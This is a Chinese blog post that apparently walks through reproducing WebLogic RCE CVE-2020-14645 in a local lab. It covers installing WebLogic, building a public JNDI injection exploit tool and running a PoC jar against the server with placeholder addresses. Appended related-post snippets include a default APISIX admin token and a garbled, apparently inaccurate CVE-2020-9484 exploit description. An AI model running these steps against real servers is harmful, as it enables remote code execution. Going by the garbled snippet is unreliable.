CVE-2020-14645漏洞本地复现

最新推荐文章于 2023-11-12 22:12:48 发布
最新推荐文章于 2023-11-12 22:12:48 发布
阅读量1.5k 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42075643/article/details/114385104
版权

CVE-2020-14645是一个weblogic远程代码执行漏洞。

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
WebLogic是美商Oracle的主要产品之一,是并购BEA得来。是商业市场上主要的Java(J2EE)应用服务器软件(application server)之一,是世界上第一个成功商业化的J2EE应用服务器, 已推出到12c(12.2.1.4) 版。而此产品也延伸出WebLogic Portal,WebLogic Integration等企业用的中间件(但当下Oracle主要以Fusion Middleware融合中间件来取代这些WebLogic Server之外的企业包),以及OEPE(Oracle Enterprise Pack for Eclipse)开发工具。

环境搭建

下载地址:

https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html

在这里插入图片描述
这里可能需要登录oracle账号才能下载,我这里有某度网盘,大家可以下载:提取码:2021

下载完成后安装:

java -jar fmw_14.1.1.0.0_wls_lite_generic.jar

注意这里如果报错,可以这样解决:

fmw_14.1.1.0.0_wls_lite_generic.jar移到java目录的jdk/bin文件夹下,在当前目录下管理员权限打开cmd执行上面命令即可~

如果无法解决,查看自己的jdk版本是否支持安装

前边直接点击下一步,这里注意,选择含实例的完整安装:
在这里插入图片描述
然后下一步,开始安装:
在这里插入图片描述
这里等待一会~
在这里插入图片描述
打√,然后点完成。
口令啥的自己设置,端口没有特殊需求可以默认

完成之后点击右下角启动域,打√,等一会系统默认浏览器启动:
在这里插入图片描述
点击右上角:
在这里插入图片描述
出现这个即成功~

搭好环境,开始复现漏洞:

工具下载:

https://github.com/welk1n/JNDI-Injection-Exploit

1、有直接打包好的jar包:
点击这里直接下载

2、在linux虚拟机里边下载:

(这个地方比较对于新手不是很友好,因为下载下来需要自己打包,我来填这个坑 😃)

git clone https://github.com/welk1n/JNDI-Injection-Exploit.git

cd JNDI-Injection-Exploit

mvn clean package -DskipTests

然后就报错了:
在这里插入图片描述
这里需要安装maven这个算是插件框架

Mvn是开发人员比较常用的一个项目管理工具,主要是对项目的创建,编译,打包操作,命令简单使用

apt-get install maven

安装成功后,执行:

mvn clean package -DskipTests

注:上边这条命令要在下载好的工具目录下执行

会有一长段内容,是在自己下载配置环境啥的,不用理会~

这个时候

ls -l

在这里插入图片描述
就能发现我们想要的东西了。
继续:

但是漏洞环境我们是在Windows上搭建的,emmmm,我们还是把target文件夹拿到Windows下来再执行吧,不会的同学点击这里,有我之前写的上传下载命令,可以在虚机和本地传文件,实在不行的同学可以直接虚机安装vmtools,安装vmtools的教程点击这里,在文件夹找到对应文件夹,复制粘贴到本地也可以。

接下来:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C [command] -A [address]

在这里插入图片描述
使用CVE-2020-14645漏洞验证工具:

https://github.com/DSO-Lab/defvul

这个也需要打包,可以根据上边的打包方法在linux下下载打包:

cd defvul-master/CVE-2020-14645_Weblogic/

mvn package

然后通过上边的方法将其拿到本地物理机:
CVE-2020-14645_Weblogic\target目录下
执行:

java -jar CVE-2020-14645.jar LDAP_IP:LDAP_PORT/#CLASS_NAME WEBLOGIC_URL

在这里插入图片描述
注意:ldap_ip和port是第一个工具生成的,后边的weblogic_url是浏览器的
弹出:
在这里插入图片描述
·
·
·
·
·
·
·
·

<小白初试,路过大佬多多指教,谢谢>

小菜茑
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
OpenSSH 安全漏洞(CVE-2020-14145)离线升级openssh9.3p1.tgz
qq_58430227的博客
07-03 1463
处理云服务器系统漏洞OpenSSH 安全漏洞(CVE-2019-6111)、(CVE-2019-6109)、(CVE-2019-6110)、(CVE-2020-14145)、(CVE-2016-20012)、(CVE-2021-41617)、(CVE-2018-15919)、(CVE-2017-15906)、(CVE-2018-15473)、(CVE-2018-15473)OpenSSH 操作系统命令注入漏洞(CVE-2020-15778)、OpenSSH 资源管理错误漏洞(CVE-2021-28041)、
升级openssh到8.8用以解决openSSH一下安全漏洞问题
07-13
升级openssh到8.4用以解决openSSH一下安全漏洞问题 OpenSSH 安全漏洞(CVE-2020-14145) OpenSSH 安全漏洞(CVE-2018-15919) OpenSSH 安全漏洞(CVE-2017-15906) OpenSSH 安全漏洞(CVE-2018-15473) 更新方法https://blog.csdn.net/u010976445/article/details/125766724
CVE-2020-14882&14883weblogic未授权命令执行漏洞复现
二狗的博客
03-29 641
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
APISIX CVE-2020-13945漏洞复现
最新发布
归零者的博客
11-12 106
Apache APISIX是一个高性能API网关。在用户未指定管理员Token或使用了默认配置文件的情况下,Apache APISIX将使用默认的管理员Token `edd1c9f034335f136f87ad84b625c8f1`,攻击者利用这个Token可以访问到管理员接口,进而通过`script`参数来插入任意LUA脚本并执行。
weblogic权限绕过远程命令执行漏洞复现CVE-2020-14482、CVE-2020-14883)
又菜又爱倒腾的博客
10-29 2261
#weblogic权限绕过/远程命令执行漏洞CVE-2020-14482、CVE-2020-14883) # 一、漏洞简介 Weblogic是Oracle公司推出的J2EE应用服务器。在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员@voidfyoo 提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14883。 CVE-2020-14882:远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic 管理控制台。 CVE-2020-14
openssh 7.4 升级 8.3
建伟博客
01-20 2661
openssh 7.4 升级 8.3
CVE-2020-14882&14883漏洞复现
m0_52089634的博客
01-03 1446
CVE漏洞复现
Linux升级openSSH到8.8用以解决openSSH安全漏洞问题
夜灬狼丶
07-13 4942
升级openssh到8.4用以解决openSSH一下安全漏洞问题 OpenSSH 安全漏洞(CVE-2020-14145) OpenSSH 安全漏洞(CVE-2018-15919) OpenSSH 安全漏洞(CVE-2017-15906) OpenSSH 安全漏洞(CVE-2018-15473)
WebLogic CVE-2020-14645分析
12-10 619
WebLogic CVE-2020-14645分析
WebLogic UniversalExtractor反序列化漏洞(CVE-2020-14645)的复现和分析
smellycat000的专栏
11-23 525
聚焦源代码安全,网罗国内外最新资讯!1.1 状态完成漏洞挖掘条件分析、漏洞复现。1.2 简介WebLogic 是美国 Oracle 公司的 Java 应用服务器,确切说是一个中间件,被...
weblogic漏洞利用工具_CVE202014645 Weblogic远程代码执行漏洞分析
weixin_39797758的博客
12-12 2184
一. 说明本文将针对Weblogic CVE-2020-14645漏洞进行分析和复现,仅从技术角度进行研究与讨论,严禁用于非法用途,违者后果自负。PS:本攻略由群友飞翔的delacroix(305536130)及Z(997362569)供稿,本人审稿。二、漏洞描述WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,We...
CVE-2020-14645:Weblogic CVE-2020-14645 UniversalExtractor JNDI注入getDatabaseMetaData()
03-08
CVE-2020-14645 Weblogic CVE-2020-14645 UniversalExtractor JNDI注入getDatabaseMetaData() 项目取决于 演示版 要求 JDK版本<JDK6u211 / 7u201 / 8u191 Weblogic版本12.2.1.4.0 不要非法使用!!!!! 参考 谢谢 @MitAh
CVE-2020-8163:CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码
03-09
CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码 在Rails <5.0.1中远程执行用户提供的本地名称 5.0.1之前的Rails版本中存在一个漏洞,该漏洞将允许攻击者控制render调用的locals参数。 已为该漏洞...
CVE-2021-25735:利用CVE-2021-25735
05-14
要部署接纳控制器,您需要在本地构建Docker容器映像,使用以下命令标记该映像并将其推送到Dockerhub。 docker login docker build -t validationwebhook:1.0 . docker tag validationwebhook:1.0 darryk/dev:1.0 ...
CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 复现环境
04-18
本附件是对CVE-2019-0232 Tomcat RCE 远程命令执行漏洞复现环境。 将文件下载到本地,直接运行tomcat 启动服务器,地址栏输入 http://localhost:8080/cgi-bin/hello.bat?c:/windows/system32/net user 即可看到...
CVE-2020-14750 漏洞复现和Linux打补丁详解
weixin_46316850的博客
11-23 3016
内有该CVE详细的靶场搭建和打补丁的内容,同时附带所需要的全部工具,复现漏洞,一文即可了解全部。
weblogic反序列化漏洞的初级理解(一)
Redredredfish的博客
08-27 4509
啥是weblogic Weblogic反序列化漏洞经过了几个阶段,利用技术也有多种变形 从利用方式来看,分为三类 1.直接通过T3协议发送恶意反序列化对象(CVE-2015-4582、CVE-2016-0638、CVE-2016-3510、CVE-2020-2555、CVE-2020-2883) 2.利用T3协议配合RMP或ND接口反向发送反序列化数据(CVE2017-3248、CVE2018-2628、CVE2018-2893、CVE2018-3245、CVE-2018-3191、CVE-2020-14
cve-2020-9484 漏洞复现
08-09
CVE-2020-9484是Apache Tomcat容器中的一种身份验证绕过漏洞。要复现漏洞,我们需要满足以下条件: 1. 安装Apache Tomcat服务器:首先需要在本地或远程环境中安装Apache Tomcat服务器。确保Tomcat版本为9.0.0.M1至9.0.0.30。 2. 配置Tomcat服务器:在Tomcat的配置文件中(通常是server.xml),需要启用HTTP Connector属性中的restEnabled参数。该参数默认为false,我们需要将其设置为true。 3. 修改用户配置文件:在Tomcat配置文件的users节点中,添加一个或多个用户。为了复现漏洞,我们需要至少添加一个用户名为test的用户及其密码。 4. 启动Tomcat服务器:启动Tomcat服务器,确保它在本地或远程环境中运行。 5. 发起请求攻击:使用任何Web请求工具(如curl、Postman等),构造以下HTTP请求: POST /servlets-examples/servlet/RequestParamExample HTTP/1.1 Host: [Tomcat服务器IP地址]:[Tomcat服务器端口号] Content-Length: [content-length] Transfer-Encoding: [transfer-encoding] attName=%25%7B%25+%27test%27%2e%25+%27class%27%7d 其中,[Tomcat服务器IP地址]替换为Tomcat服务器的实际IP地址,[Tomcat服务器端口号]替换为Tomcat服务器的实际端口号,[content-length]和[transfer-encoding]分别为请求体的长度和编码方式。 6. 漏洞验证:如果成功复现漏洞,我们将获得类似以下的服务器响应: HTTP/1.1 200 OK [其他响应头信息] Content-Type: text/html;charset=UTF-8 [其他响应体信息] ${%27test%27.class} 如果响应体中包含"${'test'.class}"的引用,则漏洞已成功复现。这说明攻击者绕过了身份验证,并成功执行了恶意代码。 需要注意的是,CVE-2020-9484漏洞可能会导致未经授权的远程代码执行,攻击者可以利用此漏洞来执行任意代码,可能导致服务器受到严重影响。在验证漏洞后,建议尽快升级Tomcat服务器,安装相应的补丁或增加其他安全措施,以避免潜在的安全威胁。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值